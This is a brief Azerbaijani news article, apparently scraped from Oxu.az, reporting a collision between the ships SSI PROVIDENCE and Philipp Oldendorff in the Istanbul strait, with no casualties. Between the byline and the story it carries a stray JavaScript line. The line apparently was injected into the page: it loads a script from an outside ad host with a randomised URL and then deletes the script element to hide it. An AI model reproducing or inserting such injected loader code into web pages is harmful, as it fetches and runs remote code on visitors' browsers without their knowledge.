İstanbul boğazında iki gəmi toqquşub

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

İstanbul boğazında iki gəmi toqquşub.

Məlumatlara görə, Türkiyə şirkətinə məxsus Marşal Adaları bayrağı altında üzən “SSI PROVIDENCE” adlı gəmidə qida ləvazimatları azalıb. Buna görə qida məhsulları daşıyan qayıq gəmiyə yan alıb. 

Bu zaman ərazidə olan Liberiya bayrağı altında üzən “Philipp Oldendorff” gəmisi naməlum səbəbdən “SSI PROVIDENCE” gəmisinə doğru üzməyə başlayıb.

Qayıqla gəmiyə ləvazimat yükləyən işçilər son anda iki gəmi arasında qalmaqdan xilas olublar.

Daha sonra “Oldendorff” gəmisi “Providence” ilə toqquşub.

Qəzada ölən və yaralanan olmayıb.

Gəmilərə dəyən zərər araşdırılır.

Mənbə: NTV.com.tr

Oxu.az

Bu yazılara da göz atın...